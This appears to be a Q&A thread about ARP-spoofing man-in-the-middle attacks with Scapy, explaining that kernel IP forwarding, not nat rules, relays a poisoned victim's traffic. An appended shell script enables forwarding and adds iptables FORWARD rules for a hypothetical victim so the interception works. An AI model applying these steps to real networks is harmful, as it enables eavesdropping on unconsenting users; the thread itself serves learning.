
Background:

I understand that in order to ARP spoof a victim in a network using Scapy, we need to send ARP reply packets to the victim and the gateway router with the correct destination and source IP addresses, but with the attacker's source MAC address, essentially stating that the attacker is the gateway to the victim, and the victim to the gateway, hence being the man in the middle. Also, the attacker would need to echo 1 to /proc/sys/net/ipv4/ip_forward to enable IP forwarding.

Question:

So my question is: after ARP poisoning the victim and the gateway, how will the victim's traffic be redirected to the router, and the router's response traffic be redirected back to the victim? Will the attacker need to change the firewall configuration in iptables? For example, in the PREROUTING chain of the nat table, redirecting the victim's traffic on TCP ports 80 and 443 to the gateway IP, and also forwarding the router's response packets (source port 80/443) back to the victim?

Since most of the examples on the web do not talk about their firewall configuration, I was wondering if changing the PREROUTING chain of the nat table was also a necessary step in order to carry out a MITM attack.

Example:

https://www.youtube.com/watch?v=fkYd8MPzgts Question about this example video: how in the world did the attacker sniff the DNS packet using Scapy just by filtering on TCP port 80? Since in the video the attacker did not show any firewall (iptables) configuration, I assumed that all of the victim's traffic, including DNS query packets, was sent to the attacker; then how did the victim obtain a connection with Google and Twitter if the attacker didn't forward the traffic to the gateway/victim?

Can someone please explain? Thank you in advance.

Grant Miller
0x5929

1 Answer


Scapy does not route the traffic, nor does it touch the traffic at all in this scenario. When you enable IP forwarding on a host, it becomes a router. When the host receives a packet not destined for one of its own addresses, its kernel will route the packet per its routing table. Since the traffic from the victim has a destination IP address not matching the attacker's machine, in most cases this will result in the traffic being forwarded on to the attacker's default gateway, which is typically the network's gateway/router.

For example, an attacker has performed a bidirectional ARP poisoning attack. The victim thinks that the attacker's machine is the router, and the router thinks the attacker's machine is the victim's. The victim sends a packet to 8.8.8.8, which is received at the attacker's machine. The packet is not addressed to the attacker, so it is sent on to the default gateway. The response from the server behaves the same way: the router will send the packet addressed to the victim, which will go to the attacker. Again, it is not addressed to the attacker, so it is forwarded again.

You mention firewall rules being involved. A clean iptables/nftables setup has default ACCEPT for all chains. There is nothing inhibiting the above routing of packets once forwarding is turned on in the kernel, unless firewall rules have been added to prevent it.

multithr3at3d
  • Thank you for such a clarifying answer, this was exactly what I needed. My iptables configuration for the filter chain is set to DROP, but I will write a rule allowing traffic from the source and destination IP for the victim. – 0x5929 Jan 18 '18 at 06:59
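The check that the answer and the follow-up comment describe, as an added example that is not part of the original question, answer, or any tool shown in the linked video: after the ARP poisoning is in place, confirm that the attacker's kernel will actually forward the victim's packets, i.e. that `ip_forward` is on and that the filter table's FORWARD chain (not the nat table's PREROUTING chain) is not dropping them. The victim address 192.168.1.20, gateway 192.168.1.1, interface eth0 and the two `iptables -S FORWARD` dumps are constructed, hypothetical values; with DRY_RUN=1 (the default) the script only prints the commands it would run, so it can be read and run without root.

```shell
#!/usr/bin/env bash
# Added example, not from the original post. Checks whether the attacker host
# will forward the victim's traffic after bidirectional ARP poisoning and
# prints (or, with DRY_RUN=0 as root, runs) the commands needed to make it so.
set -u

VICTIM=${VICTIM:-192.168.1.20}    # hypothetical victim address
IFACE=${IFACE:-eth0}              # hypothetical interface facing the LAN
DRY_RUN=${DRY_RUN:-1}             # 1 = print only, 0 = execute (needs root)

# Constructed samples standing in for `iptables -S FORWARD` output.
SAMPLE_DROP='-P FORWARD DROP
-A FORWARD -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT'
SAMPLE_ACCEPT='-P FORWARD ACCEPT'

run() { if [ "$DRY_RUN" = 1 ]; then echo "+ $*"; else "$@"; fi; }

# Default policy of the FORWARD chain from a `iptables -S FORWARD` dump
# (the "-P FORWARD <POLICY>" line). A clean setup reports ACCEPT.
forward_policy() {
  printf '%s\n' "$1" | awk '$1=="-P" && $2=="FORWARD" {print $3; exit}'
}

# True if the dump already has an ACCEPT rule keyed on the victim as source
# or destination, so no additional rule is needed.
has_victim_accept() {
  printf '%s\n' "$1" | grep -Eq -- "^-A FORWARD .*(-s|-d) $2(/32)? .*-j ACCEPT"
}

# Enable forwarding in the kernel, then open the FORWARD chain for the
# victim's traffic in both directions when the policy is not ACCEPT.
# Prints (dry run) or runs the commands; exits 0 either way.
apply_forwarding() {
  local rules="$1"
  run sysctl -w net.ipv4.ip_forward=1
  case "$(forward_policy "$rules")" in
    ACCEPT) echo "FORWARD policy is ACCEPT; no extra rules needed" ;;
    *)
      if has_victim_accept "$rules" "$VICTIM"; then
        echo "FORWARD already accepts the victim's traffic"
      else
        # victim -> gateway (and beyond), and replies coming back to the victim
        run iptables -I FORWARD -i "$IFACE" -s "$VICTIM" -j ACCEPT
        run iptables -I FORWARD -o "$IFACE" -d "$VICTIM" -j ACCEPT
      fi
      ;;
  esac
}

main() {
  local rules
  if [ "$DRY_RUN" = 1 ]; then
    rules="$SAMPLE_DROP"            # constructed dump instead of the live chain
  else
    rules="$(iptables -S FORWARD)"  # live chain; requires root
  fi
  apply_forwarding "$rules"
}
main
```

Note that nothing here touches the nat table: no DNAT or REDIRECT is needed for plain forwarding, because the victim's packets already carry the real destination IP and the kernel routes them on that. A nat rule only becomes relevant if you want to divert, say, port 80 to a local proxy instead of passing it through.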